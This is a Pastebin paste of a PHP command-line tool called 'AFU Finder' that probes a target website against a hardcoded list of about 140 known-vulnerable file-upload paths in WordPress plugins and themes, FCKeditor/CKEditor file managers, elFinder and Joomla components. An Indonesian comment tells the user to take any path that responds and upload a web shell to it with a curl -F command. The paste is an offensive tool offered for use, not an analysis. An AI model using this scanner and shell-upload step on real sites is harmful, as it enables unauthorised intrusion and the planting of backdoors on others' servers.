Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //AUTHOR | AZZATSSINS
- @error_reporting(0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- @ini_set('log_errors',0);
- /*
- Simple tutor : pertama run script (php afu.php) , kmudian masukan site target (dg http://), trus scan, jika ada yang vuln (hijau), copas full urlnya, trus exec via curl ( curl -F postfile="@shellmu.php" url) cth: curl -F Filedata="@shell.php" http://azzatssins.int/vuln/upload.php
- */
- fwrite(fopen("vulnlist.txt","w"),"/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
- /wp-content/plugins/1-flash-gallery/upload.php
- /wp-content/themes/zcool-like/uploadify.php
- /third-party/uploadify/uploadify.php
- /lib/uploadify/custom.php
- /wp-content/plugins/html5avmanager/lib/uploadify/custom.php
- /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
- /wp-content/plugins/squace-mobile-publishing-plugin-for-wordpress/uploadify.php
- /wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php
- /wp-content/themes/aim-theme/lib/js/old/uploadify.php
- /wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php
- /wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php
- /wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php
- /wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php
- /wp-content/plugins/comments_plugin/uploadify/uploadify.php
- /wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php
- /wp-content/plugins/doptg/libraries/php/uploadify.php
- /wp-content/plugins/pods/js/uploadify.php
- /wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
- /wp-content/plugins/qr-color-code-generator-basic/QR-Color-Code-Generator/uploadify/uploadify.php
- /wp-content/plugins/wp-symposium/uploadify/uploadify.php
- /wp-content/plugins/uploader/uploadify.php
- /wp-content/plugins/uploadify/includes/process_upload.php
- /wp-content/plugins/very-simple-post-images/uploadify/uploadify.php
- /fileman/
- /ckeditor/fileman/
- /ckeditor/plugins/fileman/
- /RoxyFileman/fileman/
- /assets/fileman/
- /wp-content/plugins/ckeditor-for-wordpress/includes/upload.php
- /fckeditor/editor/filemanager/browser/upload/php/upload.php
- /assets/backend/ckeditor/kcfinder/?ckact:upload
- /FCKeditor/editor/filemanager/upload/test.html
- /fckeditor/editor/filemanager/connectors/upload.php?Type=File
- /plugins/p_fckeditor/ckeditor/plugins/filemanager/
- /ckeditor/ckfinder/ckfinder.html?Type=Files
- /ckeditor/ckfinder/ckfinder.html?Type=Images
- /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/browser.html
- /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/browser/default/frmupload.html
- /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/test.html
- /wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/frmupload.html
- /wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
- /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/connectors/uploadtest.html
- /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/filemanager/connectors/test.html
- /wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
- /wp-content/plugins/fckeditor/editor/filemanager/browser/default/browser.html
- /wp-content/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html
- /admin/fckeditor/editor/filemanager/upload/test.html
- /admin/FCKeditor/editor/filemanager/connectors/uploadtest.html
- /FCKeditor/editor/filemanager/connectors/test.html
- /system/fckeditor/editor/filemanager/browser/default/connectors/test.html
- /FCKeditor/_samples/asp/sample01.asp
- /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
- /mambots/editors/fckeditor/editor/filemanager/browser/default/browser.html
- /mambots/editors/fckeditor/editor/filemanager/connectors/uploadtest.html
- /ckeditor/samples/plugins/htmlwriter/outputhtml.html
- /wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
- /wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
- /wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php
- /wp-content/plugins/mac-dock-gallery/upload-file.php
- /wp-content/themes/kernel-theme/functions/upload-handler.php
- /wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php
- /wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
- /wp-content/plugins/dzs-zoomsounds/admin/upload.php
- /wp-content/themes/dandelion/functions/upload-handler.php
- /wp-content/plugins/wordpress-member-private-conversation/doupload.php
- /wp-content/themes/Elemin/themify/themify-ajax.php?upload=1
- /wp-content/themes/Bloggie/themify/themify-ajax.php?upload=1
- /wp-content/themes/Tisa/themify/themify-ajax.php?upload=1
- /wp-content/themes/Funki/themify/themify-ajax.php?upload=1
- /wp-content/themes/Pinboard/themify/themify-ajax.php?upload=1
- /wp-content/themes/Folo/themify/themify-ajax.php?upload=1
- /wp-content/themes/grido/themify/themify-ajax.php?upload=1
- /wp-content/themes/Suco/themify/themify-ajax.php?upload=1
- /wp-content/themes/iThemes2/themify/themify-ajax.php?upload=1
- /wp-content/themes/fullpane/themify/themify-ajax.php?upload=1
- /wp-content/themes/simfo/themify/themify-ajax.php?upload=1
- /wp-content/themes/rezo/themify/themify-ajax.php?upload=1
- /wp-content/themes/bizco/themify/themify-ajax.php?upload=1
- /wp-content/themes/minshop/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-landing/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-elegant/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-base/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-corporate/themify/themify-ajax.php?upload=1
- /wp-content/themes/themify-music/themify/themify-ajax.php?upload=1
- /wp-content/themes/postline/themify/themify-ajax.php?upload=1
- /wp-content/themes/newbasic/themify/themify-ajax.php?upload=1
- /wp-content/plugins/viral-optins/api/uploader/file-uploader.php
- /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
- /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
- /wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
- /wp-content/themes/honestkim/js/redactor/demo/scripts/file_upload.php
- /wp-content/plugins/html5avmanager/lib/uploadify/custom.php
- /cms/HTMLEditor/editor/filemanager/connectors/test.html
- /CMS/HTMLEditor/editor/filemanager/connectors/test.html
- /Editor/editor/filemanager/upload/test.html
- /admin/templates/fckeditor/editor/filemanager/upload/test.html
- /javascripts/fckeditor/editor/filemanager/connectors/test.html
- /admin/htmleditor/editor/filemanager/connectors/test.html
- /admin/classes/components/formattedTextArea/fckeditor/editor/filemanager/browser/default/frmupload.html
- /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
- /wp-content/plugins/deans-fckeditor-with-pwwangs-code-plugin-for-wordpress/fckeditor/editor/filemanager/upload/test.html
- /wp-content/themes/famous/megaframe/megapanel/inc/upload.php
- /wp-content/plugins/lim4wp/includes/upload.php
- /wp-content/plugins/arcadepress/php/upload.php
- /wp-content/plugins/lb-mixed-slideshow/libs/uploadify/upload.php
- /wp-content/themes/photocrati-theme/admin/upload_edit.php
- /wp-content/plugins/custom-background/uploadify/uploadify.php
- /wp-content/plugins/placester/js/uploadify/uploadify.php
- /wp-content/plugins/custom-content-type-manager/upload_form.php
- /wp-content/plugins/drag-drop-file-uploader/dnd-upload.php
- /wp-content/plugins/mac-dock-gallery/upload-file.php
- /wp-content/plugins/foxypress/uploadify/uploadify.php
- /wp-content/plugins/asset-manager/upload.php
- /wp-content/plugins/font-uploader/font-upload.php
- /wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php
- /wp-content/plugins/gallery-plugin/upload/php.php
- /wp-content/plugins/front-end-upload/upload.php
- /wp-content/plugins/omni-secure-files/plupload/examples/upload.php
- /wp-content/plugins/wpstorecart/php/upload.php
- /wp-content/plugins/image-gallery-with-slideshow/upload-file.php
- /elFinder/php/connector.php
- /_file-manager/php/connector.php
- /assets/php/connector.php
- /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form
- /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
- /index.php?option=com_jdownloads&Itemid=0&view=upload
- /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
- /js/webforms/upload/
- /modules/simpleslideshow/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/attributewizardpro/file_upload.php
- /modules/vtemslideshow/uploadimage.php
- /modules/blocktestimonial/addtestimonial.php
- /ajax/api/hook/decodeArguments?arguments=
- /elearningku/proses.php?pilih=guru&untukdi=upload");
- print "\e[34m ___ ________ ___ ___________________ ______
- / _ /_ /_ / / _ /_ __/ __/ __/ _/ |/ / __/
- / __ |/ /_/ /_/ __ |/ / _\ \_\ \_/ // /\ \
- /_/ |_/___/___/_/ |_/_/ /___/___/___/_/|_/___/
- ";
- echo "\e[93m\n#######AFU FINDER BY AZZATSSINS######\n";
- echo "\nInput URL : "; $target=trim(fgets(STDIN));
- $page=explode("\n", file_get_contents('vulnlist.txt'));
- foreach($page as $lol) {
- $cyberserkers=$target."/".$lol;
- $ch=curl_init($cyberserkers);
- curl_setopt($ch, CURLOPT_NOBODY, true);
- curl_exec($ch);
- $azzatssins=curl_getinfo($ch, CURLINFO_HTTP_CODE);
- curl_close($ch);
- if($azzatssins==200){
- echo "\e[92m \n>> ". $cyberserkers." [Check it > Status 200 OK]";
- }elseif($azzatssins==302){
- echo "\e[92m \n>> ". $cyberserkers." [Check it > Status 302 Found]";
- }else{
- echo "\e[91m \n". $cyberserkers." ( ".$azzatssins." )\n";
- }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement